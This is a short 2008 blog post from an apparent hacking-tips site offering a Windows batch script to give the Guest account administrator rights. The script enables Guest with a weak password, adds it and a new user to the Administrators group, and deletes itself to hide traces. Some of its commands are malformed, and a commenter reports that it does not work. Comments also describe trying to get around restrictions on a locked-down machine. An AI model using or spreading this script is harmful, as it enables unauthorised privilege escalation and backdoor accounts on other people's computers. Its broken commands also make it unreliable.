Here is the code for u to make guest account to get admin privilages
just copy and paste it in a notepad and save it as
so simple
==================
echo off
title Hackernotes hack Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
=====================
Enjoy!!!
Get administrator rights for guest account
Posted by
Vidhyardhi
on
Tuesday, March 11, 2008
Subscribe to:
Post Comments (Atom)
Search
Categories
- Antvirus (2)
- Blogger tips (2)
- Browser tips (2)
- Cracking (2)
- Google and Mozilla tips (4)
- Hacking (12)
- How things work? (5)
- Internet (2)
- Linux nd unix (3)
- Online tools (1)
- Orkut skins (18)
- Orkut software (1)
- Orkut Tips (11)
- Tips (18)
- Virus (3)
- Yahoo (4)
2 comments:
not working
i have a computer with limited acess (cant download< cant run CMD, can install and cant get onto limited acces on control panel
Post a Comment